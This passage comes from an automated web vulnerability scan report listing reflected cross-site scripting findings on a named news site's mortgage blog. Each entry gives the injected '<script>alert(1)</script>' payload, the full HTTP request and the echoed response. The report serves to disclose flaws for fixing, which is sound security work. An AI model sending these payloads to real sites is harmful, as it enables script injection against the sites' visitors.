<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0358700\"><script>alert(1)</script>3e5461fd9e3/feed/" /> ...[SNIP]...
1.251. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9aad'><script>alert(1)</script>c7ff9075973 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c9aad\\\'><script>alert(1)</script>c7ff9075973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/03/?c9aad'><script>alert(1)</script>c7ff9075973=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92937
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <a href='/2008/03/?c9aad\\\'><script>alert(1)</script>c7ff9075973=1&dem_add_user_answer=true&dem_poll_id=23' rel='nofollow' onclick='return dem_addAnswer(this)' class='dem-add-answer'> ...[SNIP]...
1.252. http://mortgage.ocregister.com/2008/03/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/03/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf812"><script>alert(1)</script>a5833fbe6d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf812\"><script>alert(1)</script>a5833fbe6d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/03/?bf812"><script>alert(1)</script>a5833fbe6d8=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92929
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 March - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/03/?bf812\"><script>alert(1)</script>a5833fbe6d8=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b2c"><script>alert(1)</script>fd2de0df0b8 was submitted in the REST URL parameter 1. This input was echoed as 88b2c\"><script>alert(1)</script>fd2de0df0b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /200888b2c"><script>alert(1)</script>fd2de0df0b8/04/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/200888b2c\"><script>alert(1)</script>fd2de0df0b8/04/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df03a"><script>alert(1)</script>12872902b15 was submitted in the REST URL parameter 2. This input was echoed as df03a\"><script>alert(1)</script>12872902b15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/04df03a"><script>alert(1)</script>12872902b15/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04df03a\"><script>alert(1)</script>12872902b15/feed/" /> ...[SNIP]...
1.255. http://mortgage.ocregister.com/2008/04/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/04/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f116"><script>alert(1)</script>31b6d1dd7c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5f116\"><script>alert(1)</script>31b6d1dd7c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/04/?5f116"><script>alert(1)</script>31b6d1dd7c0=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94644
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 April - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/04/?5f116\"><script>alert(1)</script>31b6d1dd7c0=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 559a8"><script>alert(1)</script>09fc2a23169 was submitted in the REST URL parameter 1. This input was echoed as 559a8\"><script>alert(1)</script>09fc2a23169 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008559a8"><script>alert(1)</script>09fc2a23169/05/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008559a8\"><script>alert(1)</script>09fc2a23169/05/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd2"><script>alert(1)</script>a1474685425 was submitted in the REST URL parameter 2. This input was echoed as 48dd2\"><script>alert(1)</script>a1474685425 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/0548dd2"><script>alert(1)</script>a1474685425/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/0548dd2\"><script>alert(1)</script>a1474685425/feed/" /> ...[SNIP]...
1.258. http://mortgage.ocregister.com/2008/05/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05d5"><script>alert(1)</script>c73cc1d7606 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d05d5\"><script>alert(1)</script>c73cc1d7606 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/05/?d05d5"><script>alert(1)</script>c73cc1d7606=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90748
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/05/?d05d5\"><script>alert(1)</script>c73cc1d7606=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c18c"><script>alert(1)</script>1d447106e74 was submitted in the REST URL parameter 1. This input was echoed as 3c18c\"><script>alert(1)</script>1d447106e74 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083c18c"><script>alert(1)</script>1d447106e74/06/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:28 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083c18c\"><script>alert(1)</script>1d447106e74/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a31fd"><script>alert(1)</script>9ac39e7e120 was submitted in the REST URL parameter 2. This input was echoed as a31fd\"><script>alert(1)</script>9ac39e7e120 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/06a31fd"><script>alert(1)</script>9ac39e7e120/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06a31fd\"><script>alert(1)</script>9ac39e7e120/feed/" /> ...[SNIP]...
1.261. http://mortgage.ocregister.com/2008/06/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a408"><script>alert(1)</script>fcc2185e786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a408\"><script>alert(1)</script>fcc2185e786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/06/?2a408"><script>alert(1)</script>fcc2185e786=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/06/?2a408\"><script>alert(1)</script>fcc2185e786=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>9837c07890b was submitted in the REST URL parameter 1. This input was echoed as 3fb2a\"><script>alert(1)</script>9837c07890b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20083fb2a"><script>alert(1)</script>9837c07890b/07/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20083fb2a\"><script>alert(1)</script>9837c07890b/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d875f"><script>alert(1)</script>52705fa9729 was submitted in the REST URL parameter 2. This input was echoed as d875f\"><script>alert(1)</script>52705fa9729 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07d875f"><script>alert(1)</script>52705fa9729/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:10 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07d875f\"><script>alert(1)</script>52705fa9729/feed/" /> ...[SNIP]...
1.264. http://mortgage.ocregister.com/2008/07/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://mortgage.ocregister.com
Path: /2008/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dd31"><script>alert(1)</script>6838ed82b90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4dd31\"><script>alert(1)</script>6838ed82b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07/?4dd31"><script>alert(1)</script>6838ed82b90=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88852
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2008 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2008/07/?4dd31\"><script>alert(1)</script>6838ed82b90=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d08"><script>alert(1)</script>16a3cd6aa1d was submitted in the REST URL parameter 1. This input was echoed as a8d08\"><script>alert(1)</script>16a3cd6aa1d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008a8d08"><script>alert(1)</script>16a3cd6aa1d/08/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:14:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:14:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62642
